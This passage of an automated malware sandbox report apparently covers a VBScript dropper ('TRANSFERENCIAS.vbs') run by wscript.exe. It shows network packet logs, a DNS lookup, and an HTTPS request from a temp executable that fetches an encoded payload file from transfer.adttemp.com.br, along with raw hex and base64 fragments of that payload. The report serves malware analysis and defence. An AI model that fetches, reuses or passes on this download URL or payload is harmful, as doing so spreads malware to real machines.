              Oct 4, 2024 11:34:14.496462107 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.496490002 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.496541023 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.496552944 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.496767998 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.496819973 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.496840954 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.496850967 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.496880054 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.538917065 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.538971901 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.539015055 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.539055109 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.539072990 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.566580057 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.566595078 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.566641092 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.566679955 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.566684008 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.566695929 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.566720009 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.566726923 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.566751957 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.566766024 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.566782951 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.566796064 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.566843987 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.566925049 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.566983938 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.567120075 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.567161083 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.567173958 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.567182064 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.567207098 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.567224979 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.567327976 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.567392111 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.567751884 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.567795992 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.567842007 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.567856073 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.567869902 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.567898035 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.567899942 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.567923069 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.567929983 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.567945957 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.568492889 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.568572044 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.568572044 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.568586111 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.568633080 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.568792105 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.568834066 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.568857908 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.568867922 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.568895102 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.569422960 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.569494009 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.569495916 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.569514990 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.569545984 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.569701910 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.569749117 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.569750071 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.569761038 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.569797993 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.569803953 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.569813967 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.569847107 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.570312023 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.570378065 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.570385933 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.570425034 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.570439100 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.570506096 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.570550919 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.570600033 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.585098028 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.585155964 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.585201979 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.585220098 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.585233927 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.585257053 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.585270882 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.585294008 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.585311890 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.585326910 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.585352898 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.585433960 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.585505962 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.585558891 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.585627079 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.627542019 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.627607107 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.627638102 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.627674103 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.627691984 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.627902985 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.655354023 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.655411959 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.655441999 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.655483961 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.655504942 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.655560017 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.655591011 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.655616045 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.655626059 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.655639887 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.655702114 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.655741930 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.655750990 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.655846119 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.655894995 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.655903101 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.655931950 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.655967951 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.656003952 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.656033039 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.656040907 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.656054974 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.656174898 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.656208038 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.656217098 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.656224012 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.656254053 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.656285048 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.656286001 CEST44349700104.196.109.209192.168.2.7
              Oct 4, 2024 11:34:14.656342983 CEST49700443192.168.2.7104.196.109.209
              Oct 4, 2024 11:34:14.671319008 CEST49700443192.168.2.7104.196.109.209

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Oct 4, 2024 11:34:13.224869967 CEST5927353192.168.2.71.1.1.1
              Oct 4, 2024 11:34:13.357780933 CEST53592731.1.1.1192.168.2.7

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Oct 4, 2024 11:34:13.224869967 CEST192.168.2.71.1.1.10xa2d9Standard query (0)transfer.adttemp.com.brA (IP address)IN (0x0001)false

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Oct 4, 2024 11:34:13.357780933 CEST1.1.1.1192.168.2.70xa2d9No error (0)transfer.adttemp.com.br104.196.109.209A (IP address)IN (0x0001)false

              HTTP Request Dependency Graph

              • transfer.adttemp.com.br

              HTTPS Proxied Packets

              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.749700104.196.109.2094434460C:\Users\user\AppData\Local\Temp\temp_executable.exe
              TimestampBytes transferredDirectionData
              2024-10-04 09:34:14 UTC93OUTGET /qbDh2/sirdeeeeee.txt HTTP/1.1
              Host: transfer.adttemp.com.br
              Connection: Keep-Alive
              2024-10-04 09:34:14 UTC313INHTTP/1.1 200 OK
              Date: Fri, 04 Oct 2024 09:34:14 GMT
              Server: Transfer.sh HTTP Server 1.0
              Content-Disposition: attachment; filename="sirdeeeeee.txt"
              Content-Length: 382988
              Content-Type: text/plain; charset=utf-8
              X-Made-With: <3 by DutchCoders
              X-Served-By: Proudly served by DutchCoders
              Connection: close
              2024-10-04 09:34:14 UTC3783INData Raw: 4d 4a 56 4a 41 56 77 38 64 63 38 7a 6e 63 4b 76 78 58 46 52 6b 7a 37 33 44 35 46 72 77 52 41 6a 69 35 6e 72 33 66 69 73 2b 39 6d 4f 55 49 54 32 2f 67 66 41 41 6d 68 6b 4d 51 33 67 6c 70 36 66 67 4f 39 4e 44 38 41 6d 50 6e 4b 49 79 4b 6d 46 54 65 36 4f 37 41 4a 45 76 79 74 66 61 34 75 32 48 4f 63 52 6e 72 68 44 68 34 7a 64 37 4b 66 51 2b 30 43 51 4c 61 4a 70 54 39 7a 4f 30 50 38 71 52 4f 51 7a 4d 76 41 70 6f 6f 49 42 43 2f 76 74 63 50 2b 43 2f 35 2f 41 55 45 75 64 6a 76 73 2f 4d 57 78 65 36 4a 6c 44 46 45 43 34 2b 6f 31 6a 4b 62 33 66 41 45 53 49 4f 63 47 78 56 59 75 65 56 6e 4b 5a 52 65 78 56 5a 52 70 58 70 50 34 4c 48 6e 34 74 2f 6b 74 52 41 6b 50 30 77 77 42 70 37 75 67 71 76 55 4e 36 4a 73 37 30 48 78 56 56 4e 75 4f 73 78 34 54 4c 48 34 5a 49 73 4a 42
              Data Ascii: MJVJAVw8dc8zncKvxXFRkz73D5FrwRAji5nr3fis+9mOUIT2/gfAAmhkMQ3glp6fgO9ND8AmPnKIyKmFTe6O7AJEvytfa4u2HOcRnrhDh4zd7KfQ+0CQLaJpT9zO0P8qROQzMvApooIBC/vtcP+C/5/AUEudjvs/MWxe6JlDFEC4+o1jKb3fAESIOcGxVYueVnKZRexVZRpXpP4LHn4t/ktRAkP0wwBp7ugqvUN6Js70HxVVNuOsx4TLH4ZIsJB
              2024-10-04 09:34:14 UTC4409INData Raw: 79 7a 78 6d 45 6f 76 59 6f 42 31 47 32 68 42 76 6a 39 36 6a 6c 54 71 46 6e 4d 31 50 32 78 6f 6d 56 39 68 48 46 79 5a 37 62 46 30 79 59 31 62 48 70 42 46 75 6f 45 6a 56 57 66 54 53 52 4b 43 59 53 75 44 64 45 47 47 4f 74 30 65 6f 45 55 6e 68 74 33 6e 64 47 49 4c 57 56 51 69 44 52 63 50 30 51 61 75 59 62 47 43 31 4a 51 72 6d 4e 63 49 47 6f 79 52 33 43 69 62 4a 68 72 65 66 46 48 46 6f 44 32 76 49 4d 6e 75 79 37 31 2b 64 76 2f 62 62 41 41 5a 54 41 35 51 44 53 55 30 59 62 4e 52 41 44 41 30 38 45 47 41 63 6e 54 31 6c 56 78 55 58 66 51 41 79 56 38 5a 69 5a 63 41 4b 38 73 34 6f 45 78 4f 65 30 4e 6b 2f 46 78 48 76 48 67 68 36 67 39 55 6a 78 37 50 5a 62 6e 48 44 72 6e 47 4d 41 50 68 50 68 74 79 78 77 4f 7a 7a 53 4c 70 55 46 6e 5a 6a 6d 38 46 31 4b 58 6d 6b 39 52 6b
              Data Ascii: yzxmEovYoB1G2hBvj96jlTqFnM1P2xomV9hHFyZ7bF0yY1bHpBFuoEjVWfTSRKCYSuDdEGGOt0eoEUnht3ndGILWVQiDRcP0QauYbGC1JQrmNcIGoyR3CibJhrefFHFoD2vIMnuy71+dv/bbAAZTA5QDSU0YbNRADA08EGAcnT1lVxUXfQAyV8ZiZcAK8s4oExOe0Nk/FxHvHgh6g9Ujx7PZbnHDrnGMAPhPhtyxwOzzSLpUFnZjm8F1KXmk9Rk
              2024-10-04 09:34:14 UTC3591INData Raw: 4e 2f 4e 79 4c 44 41 36 34 69 62 41 39 62 32 70 4c 76 6f 59 76 43 34 35 55 45 55 31 6f 7a 44 39 36 2f 66 53 32 35 7a 74 62 7a 48 34 4b 6e 52 47 2b 51 56 67 56 54 78 52 45 75 4b 64 47 4e 76 6b 32 59 55 54 2b 4e 57 52 63 49 32 79 6f 68 57 71 51 78 77 56 52 6b 41 61 50 36 2b 68 4e 42 57 65 33 4f 43 65 71 62 62 5a 49 54 50 33 77 6a 77 43 54 72 54 64 52 79 49 76 61 66 61 35 33 70 76 55 37 34 43 71 44 79 30 53 76 77 56 79 77 77 2b 74 33 4d 74 7a 62 4e 43 30 54 2f 6e 45 56 5a 57 32 4c 77 46 7a 33 42 6c 70 66 4d 64 49 6e 56 4d 79 37 53 42 41 38 51 6e 48 59 6f 37 41 39 4c 4b 38 38 6a 6f 75 30 70 32 45 2f 63 4b 45 78 48 50 38 46 67 74 4c 71 6b 58 52 4e 50 63 49 52 4a 45 72 61 54 4e 52 44 6c 79 65 51 68 43 71 6c 56 73 32 6a 43 6d 34 48 6a 77 49 2f 45 38 7a 77 30 30
              Data Ascii: N/NyLDA64ibA9b2pLvoYvC45UEU1ozD96/fS25ztbzH4KnRG+QVgVTxREuKdGNvk2YUT+NWRcI2yohWqQxwVRkAaP6+hNBWe3OCeqbbZITP3wjwCTrTdRyIvafa53pvU74CqDy0SvwVyww+t3MtzbNC0T/nEVZW2LwFz3BlpfMdInVMy7SBA8QnHYo7A9LK88jou0p2E/cKExHP8FgtLqkXRNPcIRJEraTNRDlyeQhCqlVs2jCm4HjwI/E8zw00
              2024-10-04 09:34:14 UTC4601INData Raw: 31 51 5a 74 78 55 68 33 6e 36 6f 46 59 78 38 77 58 45 6b 4d 72 7a 78 41 74 51 77 34 49 6f 64 63 72 32 6d 69 36 79 5a 55 4c 2f 50 34 5a 52 4d 2f 2f 64 39 79 47 49 65 4a 53 48 51 33 37 55 55 4a 37 37 58 70 74 51 35 4e 4e 49 57 72 46 41 62 33 36 74 4e 43 64 56 64 37 35 54 55 66 78 2f 53 7a 67 52 79 4e 76 6f 37 39 32 4f 38 71 4e 75 49 4c 32 71 73 70 32 55 6e 38 6a 54 52 2b 73 73 6b 2b 71 53 50 45 6f 56 6e 50 47 65 37 42 6a 73 4c 7a 53 4b 59 63 71 73 31 36 4f 30 4f 4c 34 37 61 41 77 50 4c 65 36 73 37 48 33 31 61 53 36 67 4f 56 6d 2b 4d 35 48 48 32 36 68 77 70 79 4d 57 57 4e 63 32 63 39 6f 48 30 6b 6a 53 2f 39 38 47 4f 6a 34 46 49 75 58 57 4d 2f 49 78 5a 77 75 71 75 47 49 32 52 37 4a 61 31 39 6a 43 65 7a 63 4f 6c 4c 74 62 44 34 2b 53 6a 41 4c 65 35 78 43 38 38
              Data Ascii: 1QZtxUh3n6oFYx8wXEkMrzxAtQw4Iodcr2mi6yZUL/P4ZRM//d9yGIeJSHQ37UUJ77XptQ5NNIWrFAb36tNCdVd75TUfx/SzgRyNvo792O8qNuIL2qsp2Un8jTR+ssk+qSPEoVnPGe7BjsLzSKYcqs16O0OL47aAwPLe6s7H31aS6gOVm+M5HH26hwpyMWWNc2c9oH0kjS/98GOj4FIuXWM/IxZwuquGI2R7Ja19jCezcOlLtbD4+SjALe5xC88
              2024-10-04 09:34:14 UTC3399INData Raw: 50 57 33 6b 6e 55 75 77 76 78 6d 77 62 4a 50 4f 53 49 77 42 42 55 4c 4e 74 63 4f 6a 44 57 33 42 54 6f 6e 4e 70 63 6e 57 70 37 37 45 34 51 71 62 58 77 65 76 43 62 52 30 7a 64 61 56 34 4f 75 63 67 41 61 79 45 39 62 58 6f 48 70 57 62 57 48 4b 73 34 32 48 6c 32 6d 6b 49 59 33 61 55 38 4d 73 30 46 51 4a 67 33 69 51 4b 35 57 4b 38 39 4a 79 63 59 62 69 46 57 56 46 37 4c 78 54 45 62 68 70 62 4c 4e 6a 73 32 77 56 39 7a 64 2b 63 55 35 37 67 71 37 36 62 49 6b 63 39 49 73 4a 74 54 71 71 38 35 68 74 53 33 63 6e 32 5a 70 70 33 6f 6c 34 47 76 41 6f 62 58 73 75 70 47 75 37 4b 57 62 64 56 64 34 52 36 58 62 42 79 79 6e 50 7a 4b 64 64 7a 54 39 71 37 38 34 68 41 4f 46 51 79 67 2b 69 61 56 59 31 42 69 34 45 5a 62 75 59 49 53 33 4b 61 48 58 52 6f 50 4e 44 2b 57 50 35 48 6f 44
              Data Ascii: PW3knUuwvxmwbJPOSIwBBULNtcOjDW3BTonNpcnWp77E4QqbXwevCbR0zdaV4OucgAayE9bXoHpWbWHKs42Hl2mkIY3aU8Ms0FQJg3iQK5WK89JycYbiFWVF7LxTEbhpbLNjs2wV9zd+cU57gq76bIkc9IsJtTqq85htS3cn2Zpp3ol4GvAobXsupGu7KWbdVd4R6XbByynPzKddzT9q784hAOFQyg+iaVY1Bi4EZbuYIS3KaHXRoPND+WP5HoD
              2024-10-04 09:34:14 UTC4793INData Raw: 54 36 4c 4d 5a 51 44 45 4b 5a 31 37 64 75 72 44 6a 2f 33 4e 36 78 41 65 72 6c 59 48 46 47 34 72 74 73 2f 56 59 44 4f 2f 69 59 51 50 76 32 45 61 6d 4c 34 4e 31 41 4b 4d 5a 52 2b 31 33 33 41 71 2f 52 54 57 30 57 63 41 61 52 36 31 2b 6b 53 35 37 74 47 73 67 4d 4e 51 64 70 43 35 49 62 6d 2f 46 43 43 53 65 52 6a 59 50 4e 4b 35 7a 72 75 73 47 31 4f 35 30 33 56 33 6a 64 69 36 33 33 4b 56 55 61 79 48 30 6d 74 73 64 57 57 54 33 6d 79 30 4f 69 36 6c 4a 44 4e 44 64 33 6d 76 2f 7a 7a 55 6f 34 2b 56 4c 70 70 66 41 32 48 6f 6a 6b 41 47 69 75 74 59 32 47 65 30 45 74 62 44 4b 55 4f 6a 69 56 33 73 61 39 62 45 55 68 31 2f 35 66 75 38 4c 63 63 6a 72 58 6a 72 67 75 4a 37 51 45 4b 31 77 50 30 50 64 63 79 59 77 77 73 53 61 4b 51 43 4c 66 59 56 48 77 34 44 58 58 66 64 56 4d 77
              Data Ascii: T6LMZQDEKZ17durDj/3N6xAerlYHFG4rts/VYDO/iYQPv2EamL4N1AKMZR+133Aq/RTW0WcAaR61+kS57tGsgMNQdpC5Ibm/FCCSeRjYPNK5zrusG1O503V3jdi633KVUayH0mtsdWWT3my0Oi6lJDNDd3mv/zzUo4+VLppfA2HojkAGiutY2Ge0EtbDKUOjiV3sa9bEUh1/5fu8LccjrXjrguJ7QEK1wP0PdcyYwwsSaKQCLfYVHw4DXXfdVMw
              2024-10-04 09:34:14 UTC3207INData Raw: 4c 6e 41 63 76 53 7a 68 56 43 30 72 47 79 67 5a 65 44 38 42 70 4c 48 73 6a 59 2f 53 75 51 2b 6e 55 6f 47 36 63 2b 63 31 79 31 6c 51 64 38 67 4e 69 66 41 73 78 72 75 34 6f 43 4d 69 30 7a 76 34 69 32 33 6e 36 4f 7a 63 44 62 79 4b 35 58 4f 34 39 6f 79 47 6b 47 34 58 44 34 78 42 50 36 44 7a 67 61 67 41 6d 50 79 31 78 54 39 47 45 4f 73 68 38 54 78 51 59 74 5a 59 74 79 51 4b 4b 48 2b 39 44 53 56 34 5a 4e 30 6b 69 53 61 79 43 6c 77 4e 56 56 65 68 2f 73 35 33 72 73 67 55 53 36 75 34 43 75 37 57 74 77 42 75 75 42 78 64 76 42 57 54 4a 42 72 47 6e 49 38 62 33 79 68 36 6b 52 43 35 48 7a 44 44 2b 6e 74 39 43 78 47 51 70 4e 6d 55 71 69 68 54 53 41 44 57 4e 68 31 76 30 33 61 49 2b 30 35 58 42 49 55 56 34 35 5a 61 55 70 4d 53 59 6d 69 4c 66 33 61 69 2b 6f 6a 6d 63 70 52
              Data Ascii: LnAcvSzhVC0rGygZeD8BpLHsjY/SuQ+nUoG6c+c1y1lQd8gNifAsxru4oCMi0zv4i23n6OzcDbyK5XO49oyGkG4XD4xBP6DzgagAmPy1xT9GEOsh8TxQYtZYtyQKKH+9DSV4ZN0kiSayClwNVVeh/s53rsgUS6u4Cu7WtwBuuBxdvBWTJBrGnI8b3yh6kRC5HzDD+nt9CxGQpNmUqihTSADWNh1v03aI+05XBIUV45ZaUpMSYmiLf3ai+ojmcpR
              2024-10-04 09:34:14 UTC4985INData Raw: 5a 65 32 65 42 30 79 4c 38 5a 31 75 79 35 4c 65 4d 44 7a 4a 6a 71 30 54 37 53 7a 70 58 33 64 44 57 6e 47 5a 6d 6c 31 49 30 7a 44 70 33 45 49 5a 6c 49 5a 48 54 67 63 6e 72 63 77 66 5a 4f 54 6b 74 47 39 47 68 57 42 4c 63 6e 37 6b 62 37 63 6a 63 6e 30 4c 6e 35 47 67 66 72 69 68 4b 5a 4e 59 50 54 56 53 2b 34 62 52 31 74 4b 49 70 79 39 73 48 76 37 76 74 71 79 46 44 57 65 51 66 65 61 54 36 4e 75 79 50 49 58 58 33 4f 63 4a 46 35 6b 6d 39 2b 6b 64 4a 6b 2b 59 64 49 63 54 4c 56 62 70 53 76 39 43 49 6a 59 4e 75 37 36 4f 50 2f 4c 75 4a 51 76 65 4e 30 6f 39 59 51 5a 6b 58 73 56 54 31 56 69 2b 74 6b 45 78 34 53 2f 52 30 63 2f 62 58 42 67 62 79 5a 49 45 67 44 35 56 56 43 4d 77 49 68 63 4a 6c 77 45 4f 4d 74 74 39 77 66 4f 6e 68 37 54 6b 66 63 66 51 54 6e 73 55 54 62 77
              Data Ascii: Ze2eB0yL8Z1uy5LeMDzJjq0T7SzpX3dDWnGZml1I0zDp3EIZlIZHTgcnrcwfZOTktG9GhWBLcn7kb7cjcn0Ln5GgfrihKZNYPTVS+4bR1tKIpy9sHv7vtqyFDWeQfeaT6NuyPIXX3OcJF5km9+kdJk+YdIcTLVbpSv9CIjYNu76OP/LuJQveN0o9YQZkXsVT1Vi+tkEx4S/R0c/bXBgbyZIEgD5VVCMwIhcJlwEOMtt9wfOnh7TkfcfQTnsUTbw
              2024-10-04 09:34:14 UTC3015INData Raw: 58 58 52 35 37 37 38 32 58 66 37 2f 32 2f 6d 49 4a 48 68 50 32 68 2b 54 44 74 74 70 46 4b 2f 6c 2b 77 32 41 45 76 33 4c 79 4b 63 53 76 70 36 59 34 39 72 4f 53 36 58 62 4e 69 33 36 38 2f 6e 4f 63 54 31 78 53 4e 41 6a 70 67 46 77 69 6a 6b 4c 4d 34 41 51 52 6a 56 57 63 48 5a 69 35 54 77 56 36 56 34 68 33 62 35 6a 4a 59 6e 49 37 6e 39 4b 55 6a 76 36 71 66 5a 6d 4a 51 2b 33 69 68 67 77 41 58 66 79 35 6f 6a 49 76 45 2f 57 68 6a 66 7a 6c 4d 75 4c 35 62 62 44 4d 30 65 6f 72 4a 48 36 72 39 73 73 37 38 38 4b 76 37 73 46 66 6d 56 35 78 70 4d 33 53 4e 72 38 47 31 43 68 36 38 32 58 42 34 47 76 73 54 52 6d 68 44 39 73 2f 66 76 4b 6d 4f 2b 79 65 57 4f 67 6d 71 30 43 58 48 54 69 34 48 70 7a 6b 6c 63 39 62 7a 37 2b 62 6b 70 73 45 51 54 57 31 6d 68 47 4d 4c 4c 75 6b 42 30
              Data Ascii: XXR57782Xf7/2/mIJHhP2h+TDttpFK/l+w2AEv3LyKcSvp6Y49rOS6XbNi368/nOcT1xSNAjpgFwijkLM4AQRjVWcHZi5TwV6V4h3b5jJYnI7n9KUjv6qfZmJQ+3ihgwAXfy5ojIvE/WhjfzlMuL5bbDM0eorJH6r9ss788Kv7sFfmV5xpM3SNr8G1Ch682XB4GvsTRmhD9s/fvKmO+yeWOgmq0CXHTi4Hpzklc9bz7+bkpsEQTW1mhGMLLukB0
              2024-10-04 09:34:14 UTC5177INData Raw: 48 41 45 35 65 4a 67 6a 52 76 44 36 35 74 73 65 65 6c 43 6e 76 76 69 4a 42 58 78 55 51 70 6f 77 35 4b 73 71 63 34 47 65 67 41 44 6b 44 6f 59 77 30 64 45 6c 78 56 72 51 49 52 67 32 71 4a 79 4a 33 75 54 55 52 41 70 34 73 6a 33 61 78 55 56 6b 39 6d 61 4d 30 5a 7a 45 38 69 32 55 35 38 65 77 4b 50 58 51 63 36 76 4b 65 61 61 79 39 39 33 6f 4a 39 61 74 36 54 41 49 51 77 44 6e 50 4d 75 74 34 74 4e 47 36 4e 6a 48 4f 79 33 38 71 45 68 66 47 79 56 73 51 6a 4b 4d 4e 79 64 35 46 6c 78 39 38 76 59 6c 76 47 73 47 30 34 2f 79 42 38 6f 37 68 68 73 4c 4f 4a 43 55 38 78 6e 54 32 79 42 6a 4e 78 4f 7a 70 46 6a 50 46 73 4e 41 39 44 68 74 74 67 49 61 4f 56 79 2f 50 30 6d 4f 71 6a 62 66 45 50 76 41 67 66 70 4d 7a 30 56 52 66 4e 32 61 56 62 39 71 78 65 79 34 6d 77 75 34 59 47 49
              Data Ascii: HAE5eJgjRvD65tseelCnvviJBXxUQpow5Ksqc4GegADkDoYw0dElxVrQIRg2qJyJ3uTURAp4sj3axUVk9maM0ZzE8i2U58ewKPXQc6vKeaay993oJ9at6TAIQwDnPMut4tNG6NjHOy38qEhfGyVsQjKMNyd5Flx98vYlvGsG04/yB8o7hhsLOJCU8xnT2yBjNxOzpFjPFsNA9DhttgIaOVy/P0mOqjbfEPvAgfpMz0VRfN2aVb9qxey4mwu4YGI


              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:0
              Start time:05:34:10
              Start date:04/10/2024
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TRANSFERENCIAS.vbs"
              Imagebase:0x7ff7e4bb0000
              File size:170'496 bytes
